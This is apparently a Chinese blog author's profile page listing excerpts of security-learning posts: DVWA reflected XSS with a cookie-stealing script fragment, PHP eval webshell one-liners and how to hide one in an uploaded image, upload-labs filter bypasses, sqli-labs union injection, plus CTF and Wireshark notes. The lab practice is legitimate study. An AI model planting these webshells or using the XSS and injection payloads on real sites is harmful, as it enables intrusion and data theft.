自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 XSS反射型在DVWA靶场下详细实战演练

文章目录一、反射型1.等级为low1.1 在上篇文章,low等级的已经做过简单的Cookie示范,这里做一个补充。2.等级为medium2.1测试过滤方式2.2使用其他标签3.等级为high4.等级为impossible一、反射型1.等级为low1.1 在上篇文章,low等级的已经做过简单的Cookie示范,这里做一个补充。先建立文本D.jsvar img = new Image();img.src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/D

2022-03-19 20:48:58 3720

原创 XSS简易了解与测试

XSS提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录一:XSS是什么二、XSS包含类型以及攻击原理1:类型2:攻击原理2.1:反射型:2.2:存储型:2.3:DOM型:三、实战例子1.引入库2.读入数据总结一:XSS是什么XSS是跨站脚本攻击,它真正的缩写是CSS,但为了与层叠样式表CSS混淆,简称为XSS要了解到,他的原理就是它可以使得攻击者向网页中注入恶意代码,导致用户浏览器在加载网页,渲染HTML文档时会执行攻击者的恶意代码本文主要对XSS进行一个了解,以及

2022-03-15 21:43:47 2024

原创 http协议

一:http协议原理:HTTP是基于客户/服务器模式,且面向连接的。典型的HTTP事务处理有如下的过程分为四步:(1)客户与服务器建立连接首先客户机与服务器需要建立连接。只要单击某个超级链接,HTTP的工作就开始了。(2)客户向服务器提出请求建立连接后,客户机发送一个请求给服务器,请求方式的格式为:统一资源标识符(URL)、协议版本号,后边是MIME信息包括请求修饰符、客户机信息和可能的内容。(3)服务器接受请求,并根据请求返回相应的文件作为应答服务器接到请求后,给予相应的响应信息,其格式为一

2021-05-23 10:34:40 137

原创 wireshark的下载安装及使用

一:wireshark的下载官网为:https://www.wireshark.org/download.html二:在一步步下载之后最后到达:安装完毕。最后下载USBPcap最后下载完成后wireshark就可以使用了。三:1:wireshark功能介绍:wireshark能获取HTTP,也能获取HTTPS,但是不能解密HTTPS,所以wireshark看不懂HTTPS中的内容,总结,如果是处理HTTP,HTTPS 还是用Fiddler, 其他协议比如TCP,UDP 就用wiresha

2021-05-23 10:21:55 9436 2

原创 Miscx和Get_post

ctf.show:Miscx:下载文件后是一个rar文件,在打开misc1.zip后,有一个png图片和一个文件,文件需要密码。图片打开后是2020,假设是文件密码,输入后打开是一串音乐符,然后音乐符解密,解密后是rabbit加密,解密后出现,welcome_to_payhelp.其中在flag.txt和hint.txt中,都需要密码。将welcome_to_payhelp输入hint.txt后打开文件,出现一串base64加密,多次解密后出现如图:使用url解码,出现flag是hello

2021-04-25 17:17:24 162

原创 sql靶场1-4关

sql靶场:Less-01:使用?id=1’–+可以正常回显,查询列的时候,输入4错误,说明只有三列然后联合查询然后可以进行一系列爆破Less-02:首先还是用id查询:?id=1 and 1=1 正常回显?id=1’会报错,原因是单引号出现了奇数次,整形注入。用order by测试,发现有三列。并且?id=1 order by 4–+会报错。用union查询?id=-1 union select 1,2,3–+爆表:爆列爆数据Less-03:这一关开头是有点奇怪,输入*

2021-04-18 17:22:32 142

原创 一点点简单题记录

刷题记录:攻防世界Misc1:掀桌子:这个是一串代码,要将16进制转换为10进制,然后,减去128后输出ascii这里可以使用脚本,利用python下的spyder进行运行。2:坚持60s这个打开后是一个jar小程序,让玩游戏,我太菜了,不会,很好,重命名为zip文件,然后文件夹里有一个PlaneGameFrame.class然后只解压这个就可以,拖到winhex里查找flag。然后进行base64解码就可以得到flag3:stegano这题老早就见过,图片的隐写加摩斯密码,复制全部文本

2021-04-10 21:46:36 106

原创 upload-labs-1-3

Pass-01:前端验证允许上传文件类型Jpg.png.gif使用了js脚本验证代码进行检测一:burpsuite剔除响应js:对于js前端验证,直接删除js代码之后就可以绕过js验证1.这里的remove all javascript会在响应之中会删除响应的js2.在burp开启remove all javascript之后在系统配置代理服务器3.4.5.然后打开proxy intercept,使intercept状态为on,这时打开你的upload-labs,但在这里我使用本地地址.

2021-04-03 22:02:21 118 1

原创 图片写入一句话木马

图片制作一句话木马:1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?>可以发现成功写入。将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg此时dvwa出现/…/hackable/uploads/1.jpg succesf

2021-03-28 22:47:13 6220 3

原创 一句话木马

一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?>eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php的一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php的一句话木马: <?php @eval(P​OST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p

2021-03-27 14:49:08 21594

原创 2021网安第一次团队内小比赛

Misc:1:看你的刷新键是什么:这个主要是f5提示,然后是一个工具叫f5-steganography。f5-steganography工具运行必须要有Java环境,从根目录进入cmd后,输入java -Extracrt -文件名称.jpg -p 文件名。然后回车执行命令,出现output文件,打开查看后就出现flag2:easy题。在这个修改成zip格式后发现,需要密码,猜测是假加密,然后拖入winhex后查看文件类型,查看文件点,发现是伪加密,修改后正常打开,然后出现flag。3:看你们认不认真:

2021-03-23 19:56:12 161

原创 dvwa搭建

sal注入:当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。数据库类型:sql:oracle、MySQL、mssql、access、sqlite、postgersqlnosql:mongodb、redisdvwa搭建:下载小皮与dvwa,dvwa解压到www目录下,进入站点127.0.0.1。修改一个PHP文件后进入,在访问http://127.0.0.1/dvwa/setup.php的时候会报错,这时需要改ini配置以及进入

2021-03-14 12:36:28 210

原创 sql

一:联合查询:联合查询分类内连接(inner Join 或 Join)外连接(outer Join)左外连接(left outer Join 或 left Join)右外连接(right outer Join 或 right Join)全外连接(full outer Join 或 full Join)交叉连接 (cross Join)结果集链接 (union 和 union all)联合查询介绍相关数据表如下:A表在这里插入图片描述B表在这里插入图片描述C表在这里插入图片描述

2021-02-07 17:35:06 98 1

原创 html以及PHP等相关内容

HTML一个完整的HTML基本程序页面包括声明文档,根元素,元素文档定义数据和网页编码格式,标题页面内容以及定义标题和段落。HTML标签由尖括号内的关键词,并且经常是成对出现的,比如,标签中第一个标签是开始标签,第二个标签是结束标签。其中<!doctype>声明不用区分大小写,并且不同的声明内容表示不同的文档,登录框的编写<head> <meta charset="UTF-8"> <title>标题</title&gt

2021-01-24 17:30:31 217 2

原创 二进制入门

一:二进制安全:二进制安全是一种主要用于字符串操作函数相关的计算机编程术语。一个二进制安全功能(函数),其本质上将操作输入作为原始的、无任何特殊格式意义的数据流。对于每个字符都公平对待,不特殊处理某一个字符。二. 为什么学习,学习后可以做些什么?首先提出一个问题,不知道大家有没有碰到过在写代码中遇到过以下这样的问题:明明看起来代码写的毫无问题,但是却在main函数之前就已经报错。碰到一款好的软件,但是广告太烦无法关闭。你想知道一款软件的功能是如何实现的,却苦于没有源代码。软件出现崩溃,想要找

2021-01-17 16:42:11 1409 2

原创 认知数据库相关知识

第一周web一、什么是数据库?一般一个数据库系统(Database System)可分为两个部分:数据库(Database)数据管理系统(Database Management System,DBMS)A Database is an organized collection of data. —— Wikipedia数据库 就是 有组织的数据集合 ,存储在一个或多个磁盘文件中,俗称「数据的仓库」。广义上来讲,只要能储存数据的都能算数据库(如txt文档、Excel表格等)。Database M

2021-01-16 14:32:19 226 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除